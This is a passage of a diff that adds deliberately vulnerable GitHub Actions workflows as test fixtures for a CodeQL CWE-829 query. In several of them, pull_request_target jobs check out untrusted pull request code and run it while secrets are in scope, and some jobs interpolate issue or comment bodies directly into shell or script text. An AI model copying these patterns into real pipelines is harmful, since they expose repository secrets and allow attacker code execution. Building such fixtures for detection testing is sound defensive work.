write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_FRIES: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_FRIES }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - uses: rlespinasse/github-slug-action@v4 + with: + short-length: 8 + - name: Check for profanities in issue body + id: check_profanities + run: | + echo "Checking issue body for profanities..." + PROFANITIES_LIST="bad|disguting|horrible" + if echo "${{ github.event.issue.body }}" | grep -qiE "$PROFANITIES_LIST"; then + echo "Profanity detected in issue body. Please clean up the language." + exit 1 + else + echo "No profanities found in issue body." + exit 0 + fi + + cheddar: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'issue_comment' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_CHEDDAR: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_CHEDDAR }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - name: Mini Chat Bot + uses: actions/github-script@v5 + with: + script: | + const commentBody = "${{ github.event.comment.body }}"; + let response; + if (commentBody.includes("hello")) { + response = "Hello! How can I help you today?"; + } else if (commentBody.includes("help")) { + response = "Sure, what do you need help with?"; + } else { + response = "Sorry, I didn't understand that. Can you try again?"; + } + + github.rest.issues.createComment({ + issue_number: context.payload.issue.number, + owner: context.repo.owner, + repo: context.repo.repo, + body: response + }); + + gravy: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'pull_request_target' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_GRAVY: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_GRAVY }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - name: Checkout PR code + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint + npm start + + toppings: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'pull_request' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_TOPPINGS: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_TOPPINGS }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - name: Checkout PR code + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml new file mode 100644 index 000000000000..b539c562084e --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml @@ -0,0 +1,33 @@ +name: Test + +on: + workflow_call: + +env: + API_KEY: ${{ secrets.API_KEY != '' && secrets.API_KEY }} + +jobs: + mend: + runs-on: "ubuntu-latest" + steps: + - name: "Set the checkout ref" + id: set_ref + run: | + if [[ "${{ github.event_name }}" == "pull_request_target" ]]; then + echo "ref=${{ github.event.pull_request.head.sha }}" >> $GITHUB_OUTPUT + else + echo "ref=${{ github.ref }}" >> $GITHUB_OUTPUT + fi + + - name: "checkout" + if: success() + uses: "actions/checkout@v4" + with: + fetch-depth: 1 + ref: ${{ steps.set_ref.outputs.ref }} + + - name: "setup ruby" + if: success() + uses: "ruby/setup-ruby@v1" + with: + ruby-version: 2.7 diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml new file mode 100644 index 000000000000..6900c3bc23fa --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml @@ -0,0 +1,63 @@ +# This workflow uses actions that are not certified by GitHub. +# They are provided by a third-party and are governed by +# separate terms of service, privacy policy, and support +# documentation. + +# Sample workflow for building and deploying a Jekyll site to GitHub Pages +name: Deploy Jekyll site to Pages preview environment +on: + # Runs on pull requests targeting the default branch + pull_request_target: + branches: ["main"] +# Sets permissions of the GITHUB_TOKEN to allow deployment to GitHub Pages +permissions: + contents: read + pages: write + id-token: write +# Allow only one concurrent deployment per PR, skipping runs queued between the run in-progress and latest queued. +# However, do NOT cancel in-progress runs as we want to allow these production deployments to complete. +concurrency: + group: 'pages-preview @ ${{ github.event.pull_request.head.label || github.head_ref || github.ref }}' + cancel-in-progress: false +jobs: + # Build job + build: + # Limit permissions of the GITHUB_TOKEN for untrusted code + permissions: + contents: read + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + # For PRs make sure to checkout the PR branch + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - name: Setup Pages + uses: actions/configure-pages@983d7736d9b0ae728b81ab479565c72886d7745b # v5 + - name: Build with Jekyll + uses: actions/jekyll-build-pages@b178f9334b208360999a0a57b523613563698c66 # v1 + with: + source: ./ + destination: ./_site + - name: Upload artifact + # Automatically uploads an artifact from the './_site' directory by default + uses: actions/upload-pages-artifact@56afc609e74202658d3ffba0e8f6dda462b719fa # v3 + # Deployment job + deploy: + environment: + name: 'Pages Preview' + url: ${{ steps.deployment.outputs.page_url }} + # Sets permissions of the GITHUB_TOKEN to allow deployment to GitHub Pages + permissions: + contents: read + pages: write + id-token: write + runs-on: ubuntu-latest + needs: build + steps: + - name: Deploy to GitHub Pages + id: deployment + uses: actions/deploy-pages@d6db90164ac5ed86f2b6aed7e0febac5b3c0c03e # v4 + with: + preview: 'true' diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml new file mode 100644 index 000000000000..5501beb9ea2f --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml @@ -0,0 +1,58 @@ +name: branch-deploy + +on: + issue_comment: + types: [created] + +# Permissions needed for reacting and adding comments for IssueOps commands +permissions: + pull-requests: write + deployments: write + contents: write + checks: read + +jobs: + branch-deploy: + name: branch-deploy + if: # only run on pull request comments and very specific comment body string as defined in our branch-deploy settings + ${{ github.event.issue.pull_request && + (startsWith(github.event.comment.body, '.deploy') || + startsWith(github.event.comment.body, '.noop') || + startsWith(github.event.comment.body, '.lock') || + startsWith(github.event.comment.body, '.help') || + startsWith(github.event.comment.body, '.wcid') || + startsWith(github.event.comment.body, '.unlock')) }} + runs-on: ubuntu-latest + + steps: + - name: branch-deploy + id: branch-deploy + uses: github/branch-deploy@v9 + with: + trigger: ".deploy" + environment: "production" + sticky_locks: "true" # https://github.com/github/branch-deploy/blob/1f6516ef5092890ce75d9e97ca7cbdb628e38bdd/docs/hubot-style-deployment-locks.md + + # Check out the ref from the output of the IssueOps command + - uses: actions/checkout@v4 + if: ${{ steps.branch-deploy.outputs.continue == 'true' }} + with: + ref: ${{ steps.branch-deploy.outputs.ref }} + + - uses: ruby/setup-ruby@d4526a55538b775af234ba4af27118ed6f8f6677 # pin@v1.172.0 + if: ${{ steps.branch-deploy.outputs.continue == 'true' }} + with: + bundler-cache: true + + - name: bootstrap + if: ${{ steps.branch-deploy.outputs.continue == 'true' }} + run: script/bootstrap + + # Here we run a deploy. It is "gated" by the IssueOps logic and will only run if the outputs from our branch-deploy step indicate that the workflow should continue + - name: deploy + if: ${{ steps.branch-deploy.outputs.continue == 'true' && steps.branch-deploy.outputs.noop != 'true' }} + run: | + set -o pipefail + script/deploy | tee deploy.out + bundle exec ruby script/ci/render_deploy_message.rb + rm deploy.out diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml new file mode 100644 index 000000000000..4d5ae1f528cd --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml @@ -0,0 +1,64 @@ +name: Publish + +on: + push: + branches: + - main + pull_request_target: + workflow_dispatch: + workflow_call: + +jobs: + build-and-upload: + runs-on: ubuntu-latest + permissions: + contents: read + steps: + + - name: Checkout PR + if: ${{ github.event_name == 'pull_request_target' }} + uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + + - name: Checkout + if: ${{ github.event_name != 'pull_request_target' }} + uses: actions/checkout@v3 + with: + ref: main + + - name: Setup Pages + uses: actions/configure-pages@v1 + - name: Use Node.js + uses: actions/setup-node@v3 + with: + node-version: 18 + cache: npm + - name: Update npm to latest + run: npm i --prefer-online --no-fund --no-audit -g npm@latest + - run: npm -v + - run: npm i --ignore-scripts --no-audit --no-fund --package-lock + - run: npm run build -w www + - name: Upload artifact + uses: actions/upload-pages-artifact@v1 + with: + path: './workspaces/www/build' + + deploy: + runs-on: ubuntu-latest + needs: build-and-upload + environment: + name: github-pages + url: ${{ steps.deployment.outputs.page_url }} + permissions: + pages: write + id-token: write + outputs: + deployment_url: ${{ steps.deployment.outputs.page_url }} + steps: + - name: Deploy to GitHub Pages + id: deployment + uses: actions/deploy-pages@v1 + with: + preview: ${{ github.event_name == 'pull_request_target' }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow-fork.yaml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow-fork.yaml new file mode 100644 index 000000000000..98c25f832316 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow-fork.yaml @@ -0,0 +1,27 @@ +name: "pr-workflow-fork" +concurrency: + group: ${{ github.workflow }}-pr-workflow-fork-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + +on: + pull_request_target: + +jobs: + pr-workflow-fork: + uses: ./.github/workflows/pr-workflow.yml + with: + github_event_name: ${{ github.event_name }} + github_event_pull_request_head_repo_id : ${{ github.event.pull_request.head.repo.id }} + github_workflow: $ {{ github.workflow }} + github_event_pull_request_head_sha: ${{ github.event.pull_request.head.sha }} + flow: ${{( github.event_name == 'push' && 'push' ) || ( github.event_name == 'merge_group' && 'merge_queue_check' ) || ( github.event_name == 'pull_request_target' && github.event.pull_request.head.repo.id != 383289760 && 'pr_from_fork' ) || ( github.event_name == 'pull_request' && github.event.pull_request.head.repo.id == 383289760 && 'pr_from_branch' )}} + sha_to_check: ${{ github.event.pull_request.head.sha || github.sha }} + + secrets: + CACHIX_AUTH_TOKEN: ${{ secrets.CACHIX_AUTH_TOKEN }} + DOCKER_HUB_USERNAME: ${{ secrets.DOCKER_HUB_USERNAME }} + DOCKER_HUB_ACCESS_TOKEN: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }} + PABLO_PROJ_JSON: ${{ secrets.PABLO_PROJ_JSON }} + VERCEL_TOKEN: ${{ secrets.VERCEL_TOKEN }} + CANCEL_GITHUB_TOKEN: ${{ github.token }} + NIXBUILD_TOKEN: ${{ secrets.NIXBUILD_TOKEN }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml new file mode 100644 index 000000000000..061ff7d02c5e --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml @@ -0,0 +1,463 @@ +name: "pr-workflow" +concurrency: + group: ${{ github.workflow }}-pr-workflow-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true +on: + workflow_call: + inputs: + github_event_name: + required: true + type: string + github_event_pull_request_head_repo_id: + required: true + type: number + github_workflow: + required: true + type: string + github_event_pull_request_head_sha: + required: true + type: string + flow: + required: true + type: string + sha_to_check: + required: true + type: string + secrets: + NIXBUILD_TOKEN: + required: true + CACHIX_AUTH_TOKEN: + required: true + DOCKER_HUB_USERNAME: + required: true + DOCKER_HUB_ACCESS_TOKEN: + required: true + PABLO_PROJ_JSON: + required: true + VERCEL_TOKEN: + required: true + CANCEL_GITHUB_TOKEN: + required: true + +permissions: + pull-requests: write + +jobs: + dependency-review: + outputs: + ok: ${{ steps.ok.outputs.ok }} + concurrency: + group: ${{ inputs.github_workflow }}-dependency-review-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + needs: + - privilege-check + runs-on: + - ubuntu-latest + steps: + - name: checkout + uses: actions/checkout@v3 + if: ${{ inputs.github_event_name != 'merge_group' && inputs.github_event_name != 'push' }} + - uses: amannn/action-semantic-pull-request@v5 + if: ${{ inputs.github_event_name != 'merge_group' && inputs.github_event_name != 'push' }} + with: + requireScope: false + subjectPattern: (.*[a-zA-Z].*){16,} + subjectPatternError: | + https://regexper.com/#%28.*%5Ba-zA-Z%5D.*%29%7B16%2C%7D + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + + - name: dependency-review + if: ${{ inputs.github_event_name != 'merge_group' && inputs.github_event_name != 'push' }} + uses: actions/dependency-review-action@v3 + with: + # GHSA-pfrx-2q88-qq97, GHSA-w5p7-h5w8-2hfq, GHSA-wcg3-cvx6-7396 are ignored because they are casued by the static Docusaurus build. Please remove when Docusaurus gets updated. + # GHSA-969w-q74q-9j8v, GHSA-44mr-8vmm-wjhg, GHSA-wh6w-3828-g9qf are ignored because they are transitive dependencies still used by the master branch of Substrate. Please remove when Substrate update the according dependencies. + # GHSA-fjx5-qpf4-xjf2 is ignored because it is a transitive dependencies still used by the master branch of ibc-proto-rs. Please remove when ibc-rs-proto updates it. + allow-ghsas: GHSA-pfrx-2q88-qq97, GHSA-w5p7-h5w8-2hfq, GHSA-wcg3-cvx6-7396, GHSA-969w-q74q-9j8v, GHSA-44mr-8vmm-wjhg, GHSA-wh6w-3828-g9qf, GHSA-ff4p-7xrq-q5r8, GHSA-xm67-587q-r2vw, GHSA-fjx5-qpf4-xjf2 + - id: ok + run: echo "ok=true" >> "$GITHUB_OUTPUT" + + privilege-check: + name: "privilege-check" + if: ${{ inputs.flow == 'push' || inputs.github_event_name == 'merge_group' || (inputs.github_event_name == 'pull_request_target' && inputs.github_event_pull_request_head_repo_id != 383289760) || (inputs.github_event_name == 'pull_request' && inputs.github_event_pull_request_head_repo_id == 383289760) }} + continue-on-error: false + runs-on: ubuntu-latest + steps: + - run: | + echo "${{ inputs.github_event_name }}"" + echo "${{ inputs.flow }}"" + echo "${{ github.ref_name }}" + echo "${{ inputs.github_event_pull_request_head_repo_id }}" + + lfs-check: + name: lfs-check + needs: + - privilege-check + continue-on-error: false + runs-on: ubuntu-latest + concurrency: + group: ${{ inputs.github_workflow }}-lfs-check-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} + persist-credentials: false + submodules: false + lfs: true + - uses: actionsdesk/lfs-warning@v3.2 + name: lfs-warning + with: + labelName: lfs-detected! + filesizelimit: 20KB + exclusionPatterns: | + **/*.rs + **/*.ts + **/*.md + **/*.json + **/*.lock + **/*.nix + **/*.sol + **/*.toml + flake/eth-pos-devnet + - run: echo ${{ steps.lfs-warning.outputs.lfsFiles }} + + nix-flake-check: + name: "nix-flake-check" + outputs: + ok: ${{ steps.ok.outputs.ok }} + needs: + - privilege-check + runs-on: + - ubuntu-latest-m + continue-on-error: false + concurrency: + group: ${{ inputs.github_workflow }}-nix-flake-check-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + steps: + - uses: actions/checkout@v3 + with: + lfs: true + ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} + persist-credentials: false + - uses: cachix/install-nix-action@v20 + with: + nix_path: nixpkgs=channel:nixos-unstable + - uses: DeterminateSystems/magic-nix-cache-action@main + - uses: cachix/cachix-action@master + with: + authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + name: composable + skipAddingSubstituter: false + skipPush: false + - run: | + nix --version + nix show-config + nix run .#nix-flake-check --accept-flake-config + - id: ok + run: echo "ok=true" >> "$GITHUB_OUTPUT" + + + # build-all-outputs-packages-arm: + # outputs: + # ok: ${{ steps.ok.outputs.ok }} + # name: build-all-outputs-packages-arm + # needs: + # - privilege-check + # runs-on: + # - aarch64-linux-80C-128GB-2048GB + # concurrency: + # group: ${{ inputs.github_workflow }}-build-all-outputs-packages-arm-${{ github.event.pull_request.number || github.ref }} + # cancel-in-progress: true + # steps: + # - name: Set up Cachix + # if: ${{ inputs.flow == 'push' }} + # uses: cachix/cachix-action@586bf280495080c5a6d4868237ad28a860e4b309 + # with: + # authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + # name: composable + # installCommand: "true" + # - uses: actions/checkout@v3 + # if: ${{ inputs.flow == 'push' }} + # with: + # lfs: true + # ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} + # persist-credentials: false + # - name: Build all packages + # if: ${{ inputs.flow == 'push' }} + # uses: "./.github/templates/watch-exec" + # with: + # command: nix -- build .#all-outputs + # - id: ok + # run: echo "ok=true" >> "$GITHUB_OUTPUT" + + + build-all-outputs-packages: + outputs: + ok: ${{ steps.ok.outputs.ok }} + name: build-all-outputs-packages + needs: + - privilege-check + - build-all-deps-packages + runs-on: + - x86_64-linux-32C-128GB-2TB + concurrency: + group: ${{ inputs.github_workflow }}-build-all-outputs-packages-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + steps: + - name: Set up Cachix + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} + uses: cachix/cachix-action@586bf280495080c5a6d4868237ad28a860e4b309 + with: + authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + name: composable + installCommand: "true" + - uses: actions/checkout@v3 + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} + with: + lfs: true + ref: ${{ inputs.github_event_pull_request_head_sha }} + persist-credentials: false + - name: Build all packages + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} + uses: "./.github/templates/watch-exec" + with: + command: nix -- build .#all-outputs + - id: ok + run: echo "ok=true" >> "$GITHUB_OUTPUT" + + build-all-checks-packages: + outputs: + ok: ${{ steps.ok.outputs.ok }} + name: build-all-checks-packages + needs: + - privilege-check + - build-all-outputs-packages + runs-on: + - x86_64-linux-32C-128GB-2TB + concurrency: + group: ${{ inputs.github_workflow }}-build-all-checks-packages-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + steps: + - name: Set up Cachix + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} + uses: cachix/cachix-action@586bf280495080c5a6d4868237ad28a860e4b309 + with: + authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + name: composable + installCommand: "true" + - uses: actions/checkout@v3 + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} + with: + lfs: true + ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} + persist-credentials: false + - name: Build all packages + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} + uses: "./.github/templates/watch-exec" + with: + command: nix -- build .#all-checks + - id: ok + run: echo "ok=true" >> "$GITHUB_OUTPUT" + + + build-all-deps-packages: + name: build-all-deps-packages + outputs: + ok: ${{ steps.ok.outputs.ok }} + needs: + - privilege-check + runs-on: + - x86_64-linux-32C-128GB-2TB + concurrency: + group: ${{ inputs.github_workflow }}-build-all-deps-packages-${{ matrix.runner }}-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + steps: + - name: Set up Cachix + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' || inputs.flow == 'pr_from_fork' }} + uses: cachix/cachix-action@586bf280495080c5a6d4868237ad28a860e4b309 + with: + authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + name: composable + installCommand: "true" + - uses: actions/checkout@v3 + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' || inputs.flow == 'pr_from_fork' }} + with: + lfs: true + ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} + persist-credentials: false + - name: build-all-deps-packages + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' || inputs.flow == 'pr_from_fork' }} + uses: "./.github/templates/watch-exec" + with: + command: nix -- build .#all-deps + - id: ok + run: echo "ok=true" >> "$GITHUB_OUTPUT" + + draft-release-check: + name: "draft-release-check" + if: ${{ failure() || cancelled() || success() }} + continue-on-error: false + runs-on: ubuntu-latest + needs: + - build-all-checks-packages + - dependency-review + - nix-flake-check + - mantis-e2e + steps: + - run: | + echo "nix-flake-check" ${{ needs.nix-flake-check.outputs.ok }} + echo "dependency-review" ${{ needs.dependency-review.outputs.ok }} + echo "build-all-checks-packages" ${{ needs.build-all-checks-packages.outputs.ok }} + echo "mantis-e2e" ${{ needs.mantis-e2e.outputs.ok }} + - if: ${{ needs.nix-flake-check.outputs.ok == 'true' && needs.dependency-review.outputs.ok == 'true' && needs.build-all-checks-packages.outputs.ok == 'true' && needs.mantis-e2e.outputs.ok == 'true' }} + run: | + echo "All dependencies built well" + exit 0 + - if: ${{ !(needs.nix-flake-check.outputs.ok == 'true' && needs.dependency-review.outputs.ok == 'true' && needs.build-all-checks-packages.outputs.ok == 'true' && needs.mantis-e2e.outputs.ok == 'true' ) }} + run: | + echo "Some of dependencies (see jobs graph, needs attributes, and output of this job) failed" + exit 42 + + draft-release-artifacts: + name: "draft-release-artifacts" + runs-on: + - x86_64-linux-32C-128GB-2TB + needs: + - draft-release-check + if: ${{ inputs.github_event_name == 'push' }} + permissions: + pull-requests: write + contents: write + concurrency: + group: ${{ inputs.github_workflow }}-draft-release-artifacts-${{ github.ref }} + cancel-in-progress: true + steps: + - name: Set up Cachix + uses: cachix/cachix-action@586bf280495080c5a6d4868237ad28a860e4b309 + with: + authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + name: composable + installCommand: "true" + - uses: actions/checkout@v3 + with: + fetch-depth: 0 + - name: Login to DockerHub + uses: docker/login-action@v2 + with: + username: ${{ secrets.DOCKER_HUB_USERNAME }} + password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }} + - name: Download artifacts + run: | + nix run .#generate-release-artifacts --print-build-logs + + - name: Release artifacts + uses: softprops/action-gh-release@v1 + with: + draft: true + prerelease: false + fail_on_unmatched_files: true + generate_release_notes: true + body_path: release-artifacts/release.txt + name: ${{ github.ref_name }} + tag_name: ${{ github.ref_name }} + target_commitish: ${{ github.sha }} + files: | + release-artifacts/to-upload/* + + push-docker-images: + name: push-docker-images + if: ${{ inputs.flow == 'push' }} + needs: + - draft-release-check + runs-on: + - x86_64-linux-32C-128GB-2TB + concurrency: + group: ${{inputs.flow}}-${{ inputs.github_workflow }}-push-docker-images-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: false + steps: + - name: Set up Cachix + uses: cachix/cachix-action@586bf280495080c5a6d4868237ad28a860e4b309 + with: + authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + name: composable + installCommand: "true" + - uses: actions/checkout@v3 + with: + lfs: true + ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} + persist-credentials: false + - name: Build all packages + uses: "./.github/templates/watch-exec" + with: + command: nix -- build .#all + - name: Publish cmc-api to docker hub + uses: "./.github/templates/docker-publish" + with: + image_path: result/docker-image-cmc-api.tar.gz + username: ${{ secrets.DOCKER_HUB_USERNAME }} + password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }} + name: cmc-api + artifact: cmc-api:latest + + - name: Publish devnet-xc to docker hub + uses: "./.github/templates/docker-publish" + with: + image_path: result/docker-image-devnet-xc.tar.gz + username: ${{ secrets.DOCKER_HUB_USERNAME }} + password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }} + name: devnet-xc + artifact: devnet-xc:latest + tag: ${{ inputs.github_event_name == 'push' && 'main' || ''}} + + - name: Publish hyperspace-composable-rococo-picasso-rococo to docker hub + uses: "./.github/templates/docker-publish" + with: + image_path: result/hyperspace-composable-rococo-picasso-rococo.tar.gz + username: ${{ secrets.DOCKER_HUB_USERNAME }} + password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }} + name: hyperspace-composable-rococo-picasso-rococo + artifact: hyperspace-composable-rococo-picasso-rococo:latest + + - name: Publish hyperspace-composable-polkadot-picasso-kusama to docker hub + uses: "./.github/templates/docker-publish" + with: + image_path: result/hyperspace-composable-polkadot-picasso-kusama.tar.gz + username: ${{ secrets.DOCKER_HUB_USERNAME }} + password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }} + name: hyperspace-composable-polkadot-picasso-kusama + artifact: hyperspace-composable-polkadot-picasso-kusama:latest + + mantis-e2e: + name: mantis-e2e + outputs: + ok: ${{ steps.ok.outputs.ok }} + needs: + - build-all-checks-packages + runs-on: + - ubuntu-latest-m + concurrency: + group: ${{ inputs.github_workflow }}-mantis-e2e-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + steps: + - uses: actions/checkout@v3 + with: + lfs: true + ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} + persist-credentials: false + - uses: cachix/install-nix-action@v20 + with: + nix_path: nixpkgs=channel:nixos-unstable + - uses: DeterminateSystems/magic-nix-cache-action@main + - uses: cachix/cachix-action@master + with: + authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + name: composable + skipAddingSubstituter: false + skipPush: false + - name: Devnet integration tests + run: | + nix run .#mantis-e2e --accept-flake-config --impure + - id: ok + run: echo "ok=true" >> "$GITHUB_OUTPUT" diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml new file mode 100644 index 000000000000..d8381176fd23 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml @@ -0,0 +1,23 @@ +name: Test + +on: + pull_request: + +permissions: + contents: write + pull-requests: write + +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: Check out repo on head ref + uses: actions/checkout@93ea575cb5d8a053eaa0ac8fa3b40d7e05a33cc8 + with: + ref: ${{ github.head_ref }} + token: ${{ secrets.DOCUBOT_REPO_PAT }} + + - run: | + ./cmd + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml new file mode 100644 index 000000000000..72db8c29370d --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml @@ -0,0 +1,36 @@ +on: + workflow_call: + inputs: + comment: + type: string + required: true + outputs: + SHOULD_RUN: + value: ${{ jobs.resolve.outputs.SHOULD_RUN }} + GIT_REF: + value: ${{ jobs.resolve.outputs.GIT_REF }} +jobs: + resolve: + runs-on: ubuntu-latest + outputs: + SHOULD_RUN: ${{ steps.resolve-step.outputs.SHOULD_RUN }} + GIT_REF: ${{ steps.resolve-step.outputs.GIT_REF }} + steps: + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + - if: github.event_name == 'workflow_run' + uses: ./.github/actions/download-artifact + - id: resolve-step + env: + ALLOWED_COMMENT: ${{ inputs.comment }} + run: | + if [[ "${{ github.event_name }}" == "workflow_run" ]]; then + if [[ "$(head -n 1 /tmp/artifacts/metadata.txt)" == *"$ALLOWED_COMMENT"* ]]; then + echo SHOULD_RUN=true >> "$GITHUB_OUTPUT" + else + echo SHOULD_RUN=false >> "$GITHUB_OUTPUT" + fi + echo GIT_REF="$(tail -n 1 /tmp/artifacts/metadata.txt)" >> "$GITHUB_OUTPUT" + else + echo SHOULD_RUN=true >> "$GITHUB_OUTPUT" + echo GIT_REF="" >> "$GITHUB_OUTPUT" + fi diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller1.yaml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller1.yaml new file mode 100644 index 000000000000..e53e55aff4ce --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller1.yaml @@ -0,0 +1,11 @@ +name: assets-test + +on: + pull_request_target: + +jobs: + check-execution-context: + uses: TestOrg/TestRepo/.github/workflows/reusable.yml@main + with: + branch: ${{ github.event.pull_request.head.ref }} + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller2.yaml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller2.yaml new file mode 100644 index 000000000000..50c0dd4901cd --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller2.yaml @@ -0,0 +1,11 @@ +name: assets-test + +on: + pull_request: + +jobs: + check-execution-context: + uses: TestOrg/TestRepo/.github/workflows/reusable.yml@main + with: + branch: ${{ github.event.pull_request.head.ref }} + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml new file mode 100644 index 000000000000..560475dc9384 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml @@ -0,0 +1,11 @@ +name: assets-test + +on: + pull_request_target: + +jobs: + check-execution-context: + uses: 